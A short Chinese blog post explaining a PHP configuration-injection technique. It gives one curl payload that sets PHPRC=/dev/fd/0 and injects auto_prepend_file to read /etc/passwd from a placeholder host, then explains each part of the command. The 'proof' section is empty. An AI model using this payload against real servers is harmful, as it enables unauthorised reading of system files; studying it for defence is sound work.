【网络安全】PHP配置注入漏洞

未经许可,不得转载。

文章目录

正文

前提:通过探测等方式发现某个 PHP 文件存在 PHPRC 参数:

bash 复制代码
curl "https://xxx.com/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

PHPRC 用于指定 PHP 配置文件(php.ini)的路径。通过将其设置为 /dev/fd/0,我们尝试让服务器从标准输入读取 PHP 配置。

--data-binary 参数以二进制格式发送数据,适合传递原始数据而非标准表单参数。

auto_prepend_file 是 PHP 配置选项,可以在执行脚本前自动包含指定文件。这里我们设置为 /etc/passwd,试图读取系统敏感信息。

漏洞证明如下:

相关推荐
钢铁男儿6 小时前
C# 异步编程:提升程序性能与用户体验的利器
c#·php·ux
暗流者8 小时前
信息安全简要
开发语言·网络·php
Bruce_Liuxiaowei13 小时前
.htaccess 文件上传漏洞绕过总结
windows·安全·网络安全·php·apache
云罗ymh638113 小时前
碰一碰NFC开发写好评php语言源码
开发语言·php
那就摆吧15 小时前
AI赋能6G网络安全研究:智能威胁检测与自动化防御
人工智能·web安全·ai·自动化·6g
一只 Lemon16 小时前
PHP-单引号和双引号(通俗易懂讲解版)
开发语言·php
德迅云安全-小潘1 天前
网络安全风险评估:企业安全防护的核心基石
安全·web安全·php
Ai财富密码1 天前
【Python爬虫】正则表达式入门及在数据提取中的高效应用
数据库·mysql·php
WordPress学习笔记1 天前
wordpress的wp-config.php文件的详解
php·wordpress·wp-config
小楓12011 天前
後端開發技術教學(三) 表單提交、數據處理
前端·后端·html·php